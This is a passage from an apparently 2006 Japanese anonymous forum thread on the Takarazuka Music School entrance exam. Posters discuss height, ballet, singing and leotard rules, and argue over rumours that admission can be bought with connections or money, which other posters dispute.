低くてもバランスが大事とかで、小顔とか、足がキレイとか・・・
あと上半身細くても下半身デブはダメ

253 :名無しさん@花束いっぱい。:2006/10/27(金) 18:44:08 ID:+7U6m67w
身長関係ないの?
音校生でも小さい子は昔より多いってこと?

254 :名無しさん@花束いっぱい。:2006/10/27(金) 22:32:08 ID:U55e/kTa
>249
白城あやかさんとか、歌劇部に入ってて合格したはず。

あと、155以下はしなちゃんだけじゃない。知り合いが148センチで受かってた。お金だけど。全員ジャズシューズの場面でもいつもさりげなくヒール付きを履かせてもらってたなー。

255 :名無しさん@花束いっぱい。:2006/10/28(土) 20:25:11 ID:a3AsZ0NH
158cm以下はコネなしは難しいよ。

256 :名無しさん@花束いっぱい。:2006/10/28(土) 21:53:42 ID:lGMvn/XM
理想的な足の太さって何センチくらい?

257 :名無しさん@花束いっぱい。:2006/10/28(土) 22:52:05 ID:A/SpDI4g
>>255

ガセはあかんよ

258 :名無しさん@花束いっぱい。:2006/10/29(日) 10:32:21 ID:v9wpv/2n
コネなしで158以下で受かった子いるの?155以下でもコネなし受かった子いる?

259 :名無しさん@花束いっぱい。:2006/10/29(日) 14:07:09 ID:2YwhnmHv
>255=258
コネで受かった・・ての誰よ?
名前言ってよ

260 :名無しさん@花束いっぱい。:2006/10/29(日) 16:50:11 ID:v9wpv/2n
名前は言わないけど、実際コネなしで受かった子いるのかなって。
しなちゃん以外に155以下の子が今いる?

261 :名無しさん@花束いっぱい。:2006/10/29(日) 18:24:52 ID:2YwhnmHv
↑言わないってのはホントはいないからでしょ


155以下、いるじゃん 観たら分かるから探してみ
それと、おとめに記載されてる身長ってホントじゃないから
158や160って書いてあってもそんなに無いぞってジェンヌ多い
(実際プラスしてあると言ってた)傍に来ると小さいし
逆に大きすぎると低くしたりね

低くても実力あって劇団に必要ありならコネ無くても受かる
そしてコネも実力あっての話
今はコネあっても受からない方が多い


262 :名無しさん@花束いっぱい。:2006/10/29(日) 21:28:17 ID:ZzILjv8M
今年って倍率上がるの?

263 :名無しさん@花束いっぱい。:2006/10/29(日) 21:36:39 ID:v9wpv/2n
いや、いるのは事実。
でも155以下は数人しか分からないんだよね。実際楽屋出とかで見たら一目瞭然。
でもその人達は実力あるとも思えないから余計に、気になって。

264 :名無しさん@花束いっぱい。:2006/10/29(日) 22:12:57 ID:wvcU7iFy
>262
なんで??

265 :名無しさん@花束いっぱい。:2006/10/30(月) 00:10:49 ID:hpU6/y94
>263
失礼な奴 
生徒も別に263に気にしてもらいたくないだろーしな

266 :名無しさん@花束いっぱい。:2006/10/30(月) 19:17:49 ID:nH2fU4vg
この度副校長先生になりました。どうぞヨロシク。

267 :名無しさん@花束いっぱい。:2006/10/30(月) 22:33:55 ID:nf4FBHgG
>262
別に倍率は上がらないと思われ。

268 :名無しさん@花束いっぱい。:2006/10/31(火) 01:24:12 ID:NCPM8yYD
予科生って本科生と目を合わせちゃいけないんだってね。
挨拶や話す時や・・・。

人と話す時、聞く時はキチンと相手の目を見る!ってのが
礼儀だと思ってたけど音校ってホント不思議ワールドね。

269 :名無しさん@花束いっぱい。:2006/10/31(火) 01:36:49 ID:h9OIivrs
255
コネ無しっていうのはスクール生とかごり押しできる人と全く縁が無い人の事。
身長に関係なく最近では何らかの形でスクールもしくは宝塚関係者がおしてくれなきゃ合格できない。
158以下はスクールでもおしにくい。
関係者から聞いたから本当の話。
合格したいのなら大手のスクールへ行きなさい。
スクールなんか行かなくても受かると思ってる人も。

270 :名無しさん@花束いっぱい。:2006/10/31(火) 02:30:29 ID:NCPM8yYD
>>269
そーんな事書いたら、大手スクール行けば誰でも受かると勘違いするのがいるぞw
必ずや 受験スクール=コネではないのよ。全部一緒にしないで。
どこのスクールの事を指してるのかしら?
そしてアナタは生徒?学校or劇団内部の方?それなら話に頷けるけど。
「関係者から聞いた」なんて、曖昧なこと誰でも言えちゃう。
それと矛盾したこと書いてるわよ?よく見直してね。

まあ、ここの話を鵜呑みにしちゃうアホな受験生はいないと思うが。
その前に真剣な子はここ覗くような暇ないだろうしね。長文スマソ。


271 :名無しさん@花束いっぱい。:2006/11/01(水) 02:28:33 ID:yKYhrA/M
>270
だよね〜
どんなに大手のスクール行こうと落ちるヤツは落ちる
私の知人もコネも金もあって落ちたのいるもの
絶対あのコネなら合格だと思ってたから驚いたよ
必ずしもヅカ=コネじゃないんだな〜、と
しかし最近はバレエ重視みたいだけど、スタイル良い子ばかりね

272 :名無しさん@花束いっぱい。:2006/11/01(水) 08:21:19 ID:M5guTJcF
正しいバレエを踊込んできた子はスタイル良いですね。バレエはスクールで1、2年やってもスタイルまでは変わらないから、普段の歩き方から姿勢も常に意識しないとね。


273 :名無しさん@花束いっぱい。:2006/11/01(水) 14:33:54 ID:mkVK7vPp
>>227

274 :名無しさん@花束いっぱい。:2006/11/03(金) 09:52:56 ID:75YDhZ/w
age

275 :名無しさん@花束いっぱい。:2006/11/03(金) 10:42:00 ID:7pwdEeSR
265
ww

276 :名無しさん@花束いっぱい。:2006/11/06(月) 03:46:02 ID:NpUv2DCg
でもさ、数年前にスクール出身のジェンヌがセクハラ先生を訴えて以来、スクール生取らなくなったって聞いたけど。
ちがうの?

277 :名無しさん@花束いっぱい。:2006/11/06(月) 03:47:38 ID:NpUv2DCg
でもさ、数年前にスクール出身のジェンヌがセクハラ先生を訴えて以来、スクール生取らなくなったって聞いたけど。だからスクールからの合格はかなり少なくなったはず。
ちがうの?

278 :名無しさん@花束いっぱい。:2006/11/06(月) 05:51:42 ID:/xQiXV4I
二次に行く前に、で、いくら出せます?出したら次に進めますよ
的なこと言われた。スクールからじゃなく直接ね。
なんて下品な奴等だと思ってやめたよ。
よほどヅカじゃなきゃだめって執着持ってるんじゃなきゃ
10代からしっかりバレエダンスに歌やってりゃ
よほど不向きな人じゃない限り仕事なんか取れる。
そこで金払ってたって受かる保証なんかないしね。
まあ金なくても受かる人はいるんだから自分にそれだけの魅力もなかったんでしょう。

279 :名無しさん@花束いっぱい。:2006/11/06(月) 16:53:21 ID:WjC0/QmL
レオタードってどこの着るの??チャコットとかが無難!?

280 :名無しさん@花束いっぱい。:2006/11/06(月) 17:30:29 ID:T+9E7NPf
>>276,277
94期生のスレ覗いてみれば?
今年の半分以上スクール生だよ

>278
何年前の話?


281 :名無しさん@花束いっぱい。:2006/11/06(月) 19:27:56 ID:godYySOv
私も二次前に、いくら出せます?って、
親と一緒に面接時聞かれたよ!
二回受験して二回目一次受かっ時だから、
2004年の話です…
宝塚は金なんだと思って、覚めました!

282 :名無しさん@花束いっぱい。:2006/11/06(月) 20:00:02 ID:iatarJRr
あのさ、親と面接なんて無いんだけど・・・

283 :名無しさん@花束いっぱい。:2006/11/06(月) 20:25:17 ID:godYySOv
親と一緒にでした!
すみません…

284 :名無しさん@花束いっぱい。:2006/11/06(月) 21:00:53 ID:lQgHryuZ
>>283
で、誰に「いくら出せます?」って言われたワケ?
親は出せないと言ったワケ?w
面接時に言われるはずないっしょ。
で、だいたいいくらなら合格ラインなの?
そこまで言われたんなら凡そのラインは推し量れるでしょ、
親と一緒だったんだから。



285 :名無しさん@花束いっぱい。:2006/11/06(月) 21:27:05 ID:iatarJRr
だから、親と一緒になんて無いんだってば〜

286 :名無しさん@花束いっぱい。:2006/11/06(月) 22:12:03 ID:T+9E7NPf
いるんだよね、ほんとこういう時期になるとさ
こういうデマをまことしやかに流す奴が
親との面接なんて一次の後に無いでしょ
あるとしたら、ほんと何処で、誰に言われたのさ
聞きたーい

287 :名無しさん@花束いっぱい。:2006/11/06(月) 22:18:41 ID:CmsDj8Gp
2004年受けましたけど親と一緒に面接なんてなかったですよ。
大体親は合格した後しか音楽学校の中に入れないんですから。
しったかぶりはやめてください。

288 :名無しさん@花束いっぱい。:2006/11/06(月) 22:48:39 ID:lQgHryuZ
>>285 読み取れよ!ID:godYySOvが
「私も二次前に、いくら出せます?って、
親と一緒に面接時聞かれたよ! 」
なんて噴飯もののデマほざいてるから問い詰めてるんじゃ!
誰が親と一緒を鵜呑みしてるんだよ、アホか!

289 :名無しさん@花束いっぱい。:2006/11/07(火) 00:08:48 ID:qbFfFkPO
ま…信じなくても良いです。
いやみじゃ無いですが皆さんが頑張って、金無しで役取って
すがすがしい舞台作って下さい。

290 :名無しさん@花束いっぱい。:2006/11/07(火) 00:41:39 ID:b02mRF/l
私の知り合いで歌劇団の偉いさんとツウツウの
人がいます。
宝塚入るときに必要なお金は、まず1千万です。
これは本当、友達も払いましたよ。
あとは入ってからが大変。
ひと台詞ナンボの世界です。

291 :名無しさん@花束いっぱい。:2006/11/07(火) 01:04:25 ID:kAQcSjQo
>>288
285だけど、私もアナタに言ってるんじゃなくて
ガセ満開の283に言ってるんだけど。

>>290
これもガセですね。払いませんよ。入る時には。
知り合い何人かから聞いてますから(OGからも)
アナタのお知り合い本当に払ったとしたら
実力よりコネという事になっちゃいますね。
てかsageてもらいたいですね。

・・・バレエスレでもよくこういうガセあるんですよね・・・
塔婆入るのに一千万とか・・・んなワケないのに。

292 :名無しさん@花束いっぱい。:2006/11/07(火) 01:07:48 ID:7ecdf1Gk
流れブチ切ってすいません、相談させて下さい。
現在高1、声楽歴5年、他にピアノを習っていました。
親の年収は二千万ちょっと、容姿は良い方だと思いますし、目立つ方です。
しかしバレエ経験が全く無く、筋力はあっても柔軟性がありません…。
今から宝塚受験を目指すのは遅過ぎるでしょうか…?;


293 :名無しさん@花束いっぱい。:2006/11/07(火) 01:19:19 ID:b02mRF/l
<291
払いますよ。
友達はコネで入りました。
一般家庭の子だったから大変だったそうです。
歌舞伎役者の娘、芸能人の娘多いでしょ・・
そういう人が良い役もらえて長続きしてますよね?
よっぽど実力ある人は別ですが。
一般人は、辞めてしまう人が多いです。
友達も辞めましたよ。





294 :名無しさん@花束いっぱい。:2006/11/07(火) 01:22:25 ID:vtuFRHbK
無理かどうかは自分と相談なさい。
基礎をたたき込め。
レッスンについていけない、上達しないようなら無理。
アナタを実際見なきゃわからないこと。
必死で頑張って!

295 :名無しさん@花束いっぱい。:2006/11/07(火) 01:26:46 ID:b02mRF/l
<294
あなた何様のつもり?
あなたに見てもらう資格ないと思うけどなあ・・・
劇団関係者はこんなとここないでしょ?
来てたら大問題ね!
それに劇団員なら、こんなとこ来てないで
しっかり稽古に励んでほしいものだわ。


296 :名無しさん@花束いっぱい。:2006/11/07(火) 01:33:59 ID:kAQcSjQo
>>293
だからsageろってば。アンカーも逆だし。

それは昔の話だよ。凄い金コネあってもダメだった
知り合いもいるんだって。
歌舞伎役者、芸能人の娘多い?多くないよ別に。
(ヅカ入るよりそっち方面の方がいいだろうし。)
・・・つか、293はここスレの常連さんじゃない?
じゃ、マジレス損か。


297 :名無しさん@花束いっぱい。:2006/11/07(火) 09:08:26 ID:vtHzJd8r
金はわかりませんが、宝塚にコネがきくお嬢さんが、大学に行ける学力が無いので、入れて頂いたと言ってました。何も出来ないが、容姿端麗ではありました。

298 :名無しさん@花束いっぱい。:2006/11/07(火) 09:47:55 ID:LIk8VJi6
あらぁ〜今年ももうそんな時期になったのね〜
カネ・コネ談義…
神経戦の一戦術でもあるので、凹んで諦めるのは負けよ。
それから、伝聞とか、知り合いとかを持ち出す人は、
「私、特別な人よ」と優越感に浸りたいだけでお話作る人が多いので、
これも真に受けないようにね。
具体的なことは何一つ証明できないから、今後出てくるそういう人に
そこ突っ込んで聞いてごらん。真偽はおのずと明らかになるから。

299 :名無しさん@花束いっぱい。:2006/11/07(火) 10:34:47 ID:vtuFRHbK
295…………何言ってるの?

300 :名無しさん@花束いっぱい。:2006/11/07(火) 14:35:51 ID:0fRyJS0a
 四半世紀も前だけど、当時は演出家の先生(要するに試験官ね)の
お宅に「現金包んでタクシーで回って・・・」でしたね。「宝塚界隈の
タクシードライバーさんなら、ルートを知っている筈」とまで言ってる人
もいました。

 今も昔もコネカネですよ。因みに両方ないと駄目でしたね、当時は。
スクールなんて殆どなかった時代の話です。

 勿論、抜群のスター性や実力や美しさのある人は別でしょうが・・・・。


301 :名無しさん@花束いっぱい。:2006/11/08(水) 03:21:37 ID:5tGVMb0N
たしかに昔は実力より、金コネの方が多かった。

今は違いますよ。本当に。何でデマが流れるかな。
しかも300の方、その話は劇団入ってからでしょ。
ここは受験スレです。スレ違いもいいとこ。

302 :278:2006/11/08(水) 21:55:58 ID:0ibna6Sc
話題振った自分に責任あるのでカキコw
七年前ですね。
今はどうか知りません。
一次が終わった後、自宅に電話がありましたよ。
もちろんいくら出せます?的なこと聞かれたのは親。
もちろん自分がそうでやめたからって、受けたい人を阻止したいわけでないし
お金なんか積まなくても入れた子も知ってるし
逆に積んだのに落ちた人も知ってます(この人のは12年前の話)。
入ってからもお金がかかるから大変そうだけど
そういう部分もあるって知ってから入ればいいんでない?正攻法で。
最近はそんなことないのかも知れないしねw

303 :名無しさん@花束いっぱい。:2006/11/08(水) 23:07:11 ID:kHtiTYNp
うーーん、基本的に肝心なところを明記しないので15点かなw
だから、どこのだれから金積めって電話あったの?
で、正味いくらなら出そうと思ってたの?
そこまで責任持ってかいてくれなきゃ〜

304 :名無しさん@花束いっぱい。:2006/11/09(木) 02:06:47 ID:7jux1yUU
地方からの受験生は一次〜二次の間に実家に帰らないのでは?

305 :名無しさん@花束いっぱい。:2006/11/09(木) 02:23:58 ID:Ze+ShlsY
>>302
そだね、303の言うとおり、どこの誰だかまで書いてくれんと。
劇団からじゃなかったりして〜
今でいう振り込め詐欺だったりしてw

306 :名無しさん@花束いっぱい。:2006/11/10(金) 00:55:01 ID:JFBk5zMz
入りたきゃ金。
入っても金。
金さえあれば何とかなるんだよ。金さえあればね。
これは別に宝塚に限った事では無い。
金が無いのなら他の誰にも負けない実力をつけるしか無いって事。
ま、入ってからは実力だけじゃやっていけないけどねw

307 :名無しさん@花束いっぱい。:2006/11/10(金) 17:41:07 ID:UYj56QTK
誰かかけなきゃ作り話と叩く方も悪趣味だよ。
それはそれでいいって選択肢残してる上での書き込みじゃん。
金ヅカムキーって話じゃないしね。
そういう話をする人の相場は大体一千万で
かけてくるのは演出家でもPでもない中の奴な。

308 :名無しさん@花束いっぱい。:2006/11/11(土) 17:14:19 ID:/W/VtOPP
>>307
誰か書けなきゃ作り話と叩かれるのが嫌なら、
そんな話書かなきゃいいんじゃないの?
でもホント、知り合いがどうの なんて金話ガセくせ〜って
言われても仕方ないと思うが。

309 :名無しさん@花束いっぱい。:2006/11/12(日) 16:04:01 ID:ZybuDxJ8
>誰かかけなきゃ作り話と叩く方も悪趣味だよ。
悪趣味というのはこういうときに使用するものではない。

>かけてくるのは演出家でもPでもない中の奴な。
はぁ?中の奴?講師ってことか?w
疑惑を余計に撒き散らす貴様の書き込みのほうが「悪趣味」だ。

>1千万?はぁ?これホントなら重大な犯罪になるんですけど〜
中の奴なら。
「悪趣味」通り越してんな〜貴様。

310 :名無しさん@花束いっぱい。:2006/11/13(月) 22:38:20 ID:s8RCahZZ
金がある人はだいたい実力もあるんだよ…。

お金さえあればいい先生に教わったり、環境が整った場所でレッスンできるでしょう。
お金持ちの子は自分にどんどん投資して才能を伸ばしていく。
もちろん本人も人並はずれた努力はしてるだろうけどね。
先生が著名なかたなら求められるものに答えていく努力はそう簡単にできるものじゃないと思うし。


でも私だったら、恵まれた環境で育ったジェンヌより恵まれない環境でアルバイトしながら必死にレッスンしてきたジェンヌを応援する。
そういうジェンヌこそ宝塚を新しい方向に導ける存在だと思う。

だからみんな頑張ってほしいな。
今しかないんだよ、いましか。

311 :名無しさん@花束いっぱい。:2006/11/14(火) 01:26:38 ID:XctUkt7e
>>310
ヲイヲイ・・・
金があるヤツは実力あるって?何てハッピーさんな人なんだろ〜w

昔のヅカは実力無いけど金はタンマリなのでいっぱいだぞ。
近年でもたま〜にいる。舞台観てると一人は必ずいる
「何であの人、入れたの」

312 :名無しさん@花束いっぱい。:2006/11/14(火) 10:18:44 ID:1PlFJynH
>>311はなんでそんなに必死なんだろう。

実力ないのに金で入った子がいたーって得意そうに行ってるけどあなた関係者?
なんであの子が…って子だってなにか光るものがあったっていう考え方は出来ないのかな。
私だったらそう考えて、レッスン頑張るけどなぁ。

313 :名無しさん@花束いっぱい。:2006/11/14(火) 15:37:27 ID:OnZMMl7K
従妹が受験するらしいんだが、バレエはコンクール入賞したこともあって
親も年収は二千万以上はあるはず。
でも声楽は始めたばかりで、はっきり言って音痴。
160センチないくらいで顔もかわいいんだが、音痴って受かるのか?
身長からいうと娘役だし、音痴は厳しい気がするんだけど。

314 :名無しさん@花束いっぱい。:2006/11/14(火) 15:47:36 ID:TuhHrS4M
親の年収は、音痴を超えられないから〜w
ゆとりがあるご家庭なら、従妹に相談する以前に、それなりの個人レッスンの
講師を見つけられるだろうに。
それとも、313のちょいと屈折した老婆心ってヤツですか〜pgr

315 :名無しさん@花束いっぱい。:2006/11/14(火) 16:56:28 ID:mwfjzj72
相当のコネや年収があっても音痴はねぇ………

今はバレエが多少出来るより、歌える子を取るからね
それに入賞って言ったって、優勝や準優勝ぐらいでないと
掃いて捨てるぐらいいるし、コンクールにもよるしね

316 :名無しさん@花束いっぱい。:2006/11/14(火) 20:25:57 ID:mSOWL67w
男役路線系なら音痴でも

317 :名無しさん@花束いっぱい。:2006/11/14(火) 21:16:49 ID:GwdmlA6t
タニさんのことを悪く言うなよWW

318 :名無しさん@花束いっぱい。:2006/11/14(火) 21:36:08 ID:XctUkt7e
>>312
舞台、路線とトプしか観てないの?生徒全部ちゃんと観てごらん。
(皆じゃなく一人くらいはいると書いてんのに・・)
ま、そうオモテたらいーんでないの。別に構わんよw
得意そうってナーニ勘違いしてんだかw
(こんな事で得意になっても何の得もないし)
最近はカネコネ少なくなったね、って話なのに。

しかし読解力0だね。ま、いいけど。
ヅカを美化しすぎ。どっちかといえばあそこは企業だし。
ヅカだけじゃないけど、あの手のとこはそんなおキレイな世界じゃない。
温室だしね。仕方ない。




319 :名無しさん@花束いっぱい。:2006/11/15(水) 00:07:08 ID:HSDKlKd+
>>316
そうだよ! タニさんのこと悪く言うなよ!
そんなに音痴音痴ってタニがかわいそうじゃねえか!

320 :名無しさん@花束いっぱい。:2006/11/15(水) 02:04:32 ID:eJd8vV1x
>317、319
やめて〜腹がよじれる〜www

321 :名無しさん@花束いっぱい。:2006/11/15(水) 05:11:27 ID:82t26rtm
>>318
あーはいはいW
もうわかったからWWWW
粘着しないでよWWW

322 :名無しさん@花束いっぱい。:2006/11/15(水) 15:56:55 ID:eJd8vV1x
>321が粘着なのでは?何か喜んでるし。
ageてるとこがまたw


323 :名無しさん@花束いっぱい。:2006/11/19(日) 22:05:18 ID:O9nI7avI
受験票の発売って明日からですか?

324 :名無しさん@花束いっぱい。:2006/11/19(日) 22:11:59 ID:EesgRj5G
視唱って難しそうですね
楽譜のみで歌を歌うんですよね?
声楽を習えば出来るようになるのでしょうか?
ピアノでも習わないとダメなのかな


325 :名無しさん@花束いっぱい。:2006/11/19(日) 22:32:47 ID:e8Ao0Him
>>324
声楽だけでも大丈夫ですよ。
頑張れ。

326 :名無しさん@花束いっぱい。:2006/11/19(日) 22:36:25 ID:EesgRj5G
即レスありがとうございます
時間がなくて通えないかもしれませんが、声楽を考えてみます

327 :名無しさん@花束いっぱい。:2006/11/20(月) 00:12:04 ID:LobRBFId
歌が1番ポイント高いんでしょ?
バレー自信ないな

328 :名無しさん@花束いっぱい。:2006/11/20(月) 00:15:09 ID:4GxtA8uy
ないないバレエ。自信ない。

せめて一次、今年は下見程度の意気込み。

329 :名無しさん@花束いっぱい。:2006/11/20(月) 00:20:51 ID:wgABNbZb
バレーボールは試験にないから
大丈夫!!!

バレーって書いてる時点でねぇ・・・・。

330 :名無しさん@花束いっぱい。:2006/11/20(月) 00:34:15 ID:LobRBFId
今月からバレエ習ったもんだから^^;

331 :名無しさん@花束いっぱい。:2006/11/20(月) 00:44:50 ID:mUd4dgIw
今年はバレエの年よ。

332 :名無しさん@花束いっぱい。:2006/11/20(月) 01:14:50 ID:4GxtA8uy
容姿じゃないの?

333 :名無しさん@花束いっぱい。:2006/11/20(月) 19:08:17 ID:IXr3spAQ
課題曲何?

334 :名無しさん@花束いっぱい。:2006/11/20(月) 19:18:28 ID:kmtyv7fJ
こんなとこでアホな質問してる時点で・・・ムリポw

335 :名無しさん@花束いっぱい。:2006/11/20(月) 20:37:43 ID:OAm/oi6/
バレエ習ったことないけど、バレエとバレーの表記違いくらい知ってる。

336 :名無しさん@花束いっぱい。:2006/11/20(月) 22:14:48 ID:6KauaW9F
a

337 :名無しさん@花束いっぱい。:2006/11/21(火) 12:45:51 ID:GPJBkz6K
少子化なうえ、あんな人気ないんだからみーんな受かるんじゃないの〜(゚∀゚)


338 :名無しさん@花束いっぱい。:2006/11/21(火) 15:50:49 ID:9Ft1W976
やっぱりでたな、オーソレミオ。

339 :名無しさん@花束いっぱい。:2006/11/21(火) 16:52:44 ID:cIxfnrsV
しっつたかぶりがイッツパ〜〜〜ぃ。。ぷっ=3

340 :・・:2006/11/24(金) 17:56:40 ID:c+uDyImL
あんたら受ける気あんのかよ。。

341 :名無しさん@花束いっぱい。:2006/11/24(金) 19:32:12 ID:isvIPn2l
受かる技量も受験できる若さも無いオヴァの煽りがほとんでそ

342 :名無しさん@花束いっぱい。:2006/11/24(金) 21:50:33 ID:If0G0QYV
オヴァには受かる技量なるものは基本的に必要ないワケで…


343 :名無しさん@花束いっぱい。:2006/11/26(日) 11:29:06 ID:sa0GwnGk
夢の発表会12月だってね。詳細知ってる人教えて!!!

344 :名無しさん@花束いっぱい。:2006/11/27(月) 00:31:20 ID:FhOjApmU
盛り上がってないね

345 :名無しさん@花束いっぱい。:2006/11/28(火) 23:57:45 ID:lAUUe1Ii
今年って45人とらないらしいね。
一般受験はきついとか本当なのかな…

スクール生って、やっぱり得?いっぱい取ってくれるの?

346 :名無しさん@花束いっぱい。:2006/11/29(水) 00:47:50 ID:Kfy9Edkd
>345
結局、50人近くも音校(劇団)に入れたいと思うような
実力ある子がいないということらしい。
バレエが出来て歌が上手くて発声も良し性格良さそうで
容姿バッチリ・・・。
そんな凄い子がたくさんいる訳ないしね。
まあ、それらが平均点でも揃ってる子は少ないと思うし。


347 :名無しさん@花束いっぱい。:2006/11/29(水) 02:16:05 ID:J1BdnvvS
課題曲、どれが歌いやすいと思います?

348 :名無しさん@花束いっぱい。:2006/11/29(水) 02:43:14 ID:ZV0Y73ja
夢の発表会は12月26日きゅりあんだよ。
去年は5人入ったね。今年は有望な子いる?

349 :名無しさん@花束いっぱい。:2006/11/29(水) 16:46:32 ID:34VC0X20
宝塚的に性格が良いって
どんなんだろ…
アピール出来る子?
それとも謙虚な子?

350 :名無しさん@花束いっぱい。:2006/11/29(水) 17:59:25 ID:Bb7rhl7n
スクールに入ってなくて、地方のバレエ教室にだけ通っている子って受かるの?
今までに受かった子いる?

351 :名無しさん@花束いっぱい。:2006/11/29(水) 18:38:12 ID:hgAINSSz
野ばら、出船のどっちかかな。


352 :名無しさん@花束いっぱい。:2006/11/29(水) 18:38:51 ID:hgAINSSz
あ、夢のHちゃんは?中3の。


353 :名無しさん@花束いっぱい。:2006/11/29(水) 22:58:41 ID:34VC0X20
KIEってどうなんですか?
厳しいと聞きましたが…

354 :名無しさん@花束いっぱい。:2006/11/30(木) 00:38:05 ID:0JQRaxNs
>353
専用スレあるから(KIEの)そっちで聞いてごらん。


355 :名無しさん@花束いっぱい。:2006/11/30(木) 16:49:12 ID:vkXBuUfs
地方の教室だけって難しいんじゃない?今は皆スクール行ってるでしょ。
スクール行ってなくて受かった子は、各期に2人くらいじゃない?

356 :名無しさん@花束いっぱい。:2006/12/01(金) 16:03:03 ID:jOQ4YWT9
>>355
んー…年によるよね。
スクール生ばかりとる年もあれば、一般から結構とったりする年もあるしねぇ。

でも45人だったら…やっぱりスクール生中心になるのかな

357 :名無しさん@花束いっぱい。:2006/12/01(金) 16:58:44 ID:LZJBXu9s
皆の言う一般ってどういう所?一切宝塚とは関係ない教室?(でもバレエの中では有名とか・・?)

358 :名無しさん@花束いっぱい。:2006/12/02(土) 10:48:03 ID:zHFCd9yl
スクール生ばっかりしかとらないの?
スクール生はあまりとらなくなったって聞いたけど。

359 :名無しさん@花束いっぱい。:2006/12/02(土) 11:47:53 ID:2KzH2FCV
93期はスクール生少なかったけど、94期はほとんどスクール生だよ。

360 :バレエ:2006/12/02(土) 12:13:48 ID:6QPusCLA
受験のレオタードって、黒、七分、丸襟、飾りなしでなければいけないのでしょうか?

361 :名無しさん@花束いっぱい。:2006/12/02(土) 13:41:00 ID:cIG9PY+X
>360
当たり前です。
絶対です


362 :バレエ:2006/12/02(土) 21:46:24 ID:6QPusCLA
プリンセスラインは良いんですか?
そういう書き込みがありますが。

363 :名無しさん@花束いっぱい。:2006/12/02(土) 22:58:13 ID:8CFC0dpn
プリンセスライン?何ですかそれ。

364 :名無しさん@花束いっぱい。:2006/12/03(日) 11:59:03 ID:mvNGo2OM
あんまスレ進行してないね
今年受験生少ないのか

365 :名無しさん@花束いっぱい。:2006/12/04(月) 06:59:55 ID:7EKy1o2y
真面目にレッスンしてるんでしょ
いいことだよ

366 :名無しさん@花束いっぱい。:2006/12/04(月) 17:07:12 ID:clkzVBnb
>357
地方の名の知られてないような教室から受かった子はいないんじゃない?
少なくとも名の知られたバレエ学校とか教室じゃない?

367 :名無しさん@花束いっぱい。:2006/12/08(金) 19:10:48 ID:J2K8f7x8
願書は、直接購入すれば3000円なのに、郵送の方が安いのは何故ですか?


368 :名無しさん@花束いっぱい。:2006/12/08(金) 19:42:29 ID:5sTnSetT
直接購入は2000円。

369 :名無しさん@花束いっぱい。:2006/12/09(土) 01:05:52 ID:nYvfp6Bb
今日いいともでピーコが
宝塚の合格発表がこの間あった。って言ってたけど、みた人いる?
びっくりしちゃった。

370 :名無しさん@花束いっぱい。:2006/12/09(土) 02:08:54 ID:4/qbeaxE
366>>地方の方でも受かってる人います。

371 :名無しさん@花束いっぱい。:2006/12/09(土) 13:17:55 ID:7mp9ZgOr
地方の方はそこからスクールに通ってるから受かったんじゃない?
地方の教室だけで受かった子はいないでしょ?

372 :名無しさん@花束いっぱい。:2006/12/09(土) 23:03:53 ID:t1Gb0n7U
94期スレみてご覧。スクール行ってたってみんなが知ってる子だけでもあれだけいるんだよ。一般の子なんか10人いないんじゃない?

373 :名無しさん@花束いっぱい。:2006/12/18(月) 14:01:54 ID:mcZRo78k
受験生のみんなは、どうして顔にむだ毛がないの?剃ってるにしてもかなり綺麗じゃない?何故?
お団子にするために髪を上げた時に、耳の後ろら辺の髪の毛は何であんなに綺麗なの?
髪のラインが真っ直ぐなのは何故?

374 :名無しさん@花束いっぱい。:2006/12/20(水) 13:09:06 ID:ko4tmY/t
>373 顔の無駄毛はもともとない。
お団子はそれはもうぴっちりくし目を通して結い上げているんだよ。
目がつりあがるくらいね。
それができてないということはまだまだということだよ。

375 :名無しさん@花束いっぱい。:2006/12/20(水) 16:46:15 ID:Ax+Ikjvo
顔のむだ毛?皆あるんじゃないの?目立たないだけじゃない?
でも合格発表で映ってる子は、髪の毛綺麗だし顔綺麗だよね。肌も綺麗。
何かしてるの?

376 :名無しさん@花束いっぱい。:2006/12/22(金) 23:12:05 ID:JhBJnLFU
つ【若さ】

377 :名無しさん@花束いっぱい。:2006/12/23(土) 13:31:16 ID:PPeSVDRu
私はエステに通うなどして、ムダ毛を目立たないようにし、どうしても気になるところは永久脱毛しました。
エステに通うと代謝がよくなり、足の疲れがとれます。
週6レッスン、1日休日にしています。
受験生の皆さんは足浮腫んだりしますか?
水分摂取量にも問題があるのでしょうか…。

378 :名無しさん@花束いっぱい。:2006/12/23(土) 19:12:04 ID:qlqPhbwp
永久脱毛ってどこのサロンがいいのかな?
以前通ってたけど、一箇所に3時間かかるし、レーザー脱毛しても
肌の奥に眠ってる毛がまた生えるから、なんか意味なかった。

379 :名無しさん@花束いっぱい。:2006/12/24(日) 01:09:52 ID:h5R317d1
宝塚ってO脚多いんだね…
ちょっとガッカリしました

380 :名無しさん@花束いっぱい。:2006/12/24(日) 02:14:16 ID:fzOpctnE
>379
つかさ日本人はO脚の方が断然多いんだよ 仕方無いっしょ
バレリーナもよくみると結構いるし

あと骨盤歪むとO脚になる 

381 :名無しさん@花束いっぱい。:2006/12/24(日) 11:48:30 ID:h6U9yYEB
>380
聞きかじりの一知半解なこと言わないほうがいいよ。
どこでそんなこと聞いたの?
骨盤の歪みだけじゃないんだよね、この時期になると出てくる
整体屋さんですか?pgr

382 :名無しさん@花束いっぱい。:2006/12/25(月) 00:47:00 ID:1qYXbnS2
>>380
お前O脚だから反論してんだろ
O脚はバレリーナになれませんwww
宝塚は日本だけだから結構いるだけだと思われ

383 :名無しさん@花束いっぱい。:2006/12/25(月) 02:53:23 ID:s18UZIC4
>381
聞きかじりじゃなくて事実だよ 勉強しなさい
それがバレエは日本人には踊れないって欧米人に馬鹿にされる原因の1つ
それと歪みとO脚の関係も事実(でもそれだけとは書いてないでしょ)
嘘だと思うならググッてみ

>382
ホント何にも知らんのねw
O脚だとバレリーナになれない、だ?おバカさんだねw
日本の某バレエダンサーも何人かそうなのよ(でも海外のバレエ団で活躍した)
そう見えないように踊ってるの バレエ界では当たり前の事です
皆レッスンとか努力してそう見えないようにしてるんだよ

最近のコンクールでも上位入賞しててよくあの脚で・・って子いるし
でも変なトゥ・シューズの履き方してるので先生の指導の仕方、問われるが



384 :名無しさん@花束いっぱい。:2006/12/25(月) 03:34:34 ID:s18UZIC4
あ、そうそう書き忘れたけど
382さんの言うとーり、私はヒドイO脚だったのよ 
生まれつきと諦めてたけど実はそれが聞きかじりの浅はか知識だったワケで
骨盤の歪みを矯正する事で治ったの 自分でも出来るのよ
私は整体にも行ったけどね (しかも脚も細くなるし、痩せやすくなる)
